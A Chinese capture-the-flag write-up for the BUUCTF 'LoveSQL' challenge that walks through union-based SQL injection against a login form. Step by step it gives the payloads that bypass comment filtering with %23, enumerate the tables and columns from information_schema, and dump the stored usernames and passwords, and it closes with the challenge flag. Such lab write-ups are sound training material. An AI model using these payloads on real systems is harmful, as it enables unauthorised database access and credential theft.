BUUCTF LOVESQL

打开网页后,利用hackbar,先来查询他的列数 1‘ order by 3#

BUUCTF LOVESQL_第1张图片

试了1,2,3,4都不行,初步判断#是被后端代码过滤掉了,我们试试--+,和#的效果是一样的

BUUCTF LOVESQL_第2张图片

但是当我尝试使用--+后发现仍然没有反应,说明后端代码也过滤掉了--+,我们采用另外一种方式,使用%23

BUUCTF LOVESQL_第3张图片

当我把3改为4时,出现了,说明列数为3,接下来好办了,老套路

BUUCTF LOVESQL_第4张图片

使用联合查询:1’ union select 1,2,3 %23

BUUCTF LOVESQL_第5张图片

 2,3有回显,说明2,3存在注入点

找数据库

?username=111&password=1' union select 1,database(),3%23

BUUCTF LOVESQL_第6张图片

 找表:?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=123

BUUCTF LOVESQL_第7张图片

找字段名:?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=123
 最后一步,查找flag:?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=123

BUUCTF LOVESQL_第8张图片

flag{ffca586a-1613-4ebe-8d3b-63eae7e2e574}

你可能感兴趣的:(数据库,sql,mariadb)